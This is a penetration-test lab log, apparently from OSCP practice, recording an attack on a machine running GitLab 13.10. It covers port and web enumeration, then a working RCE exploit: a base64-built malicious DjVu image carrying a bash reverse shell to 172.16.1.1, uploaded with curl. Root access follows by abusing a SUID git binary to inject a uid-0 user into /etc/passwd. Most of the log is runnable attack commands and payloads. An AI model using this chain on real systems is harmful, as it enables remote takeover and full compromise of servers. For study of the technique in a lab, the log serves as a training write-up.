Code V2
๐งช Pentest Log: {{date:2025-08-28}}
๐ Target Information
- Machine Name: Code V2
- IP Address: 10.11.1.148
- Operating System: Linux
ip=10.11.1.148
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Found the /help page, obtain GitLab version
13.10
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/50532
- Setup
echo -e "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="
| base64 -d > lol.jpg
echo -n '/bin/bash -i >& /dev/tcp/172.16.1.1/80 0>&1' >> lol.jpg
echo -n
"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="
| base64 -d >> lol.jpg
- Exploit
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80
curl -v -F 'file=@lol.jpg' http://10.11.1.148/$(openssl rand -hex 8)
๐งฌ Privilege Escalation
๐ค Current Access
- User: git
- Groups: 993(git)
- Shell Type: reverse shell
๐ Enumeration
SUID:
find / -type f -perm -4000 2>/dev/null
found
/usr/bin/git
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: SUID Abuse
- Target Binary/Service: git
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
cd /etc
/usr/bin/git init
/usr/bin/git diff /dev/null /etc/passwd > /tmp/output.txt
echo '+tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /tmp/output.txt;
vi /tmp/output.txt
@@ -0,0 +1,26 @@
/usr/bin/git add passwd
/usr/bin/git mv passwd passwd.bak
/usr/bin/git apply --unsafe-paths --directory=/ /tmp/output.txt
- Smash to root
su tony
password
- Key File
h80ndlgasgtf9mfe5tpo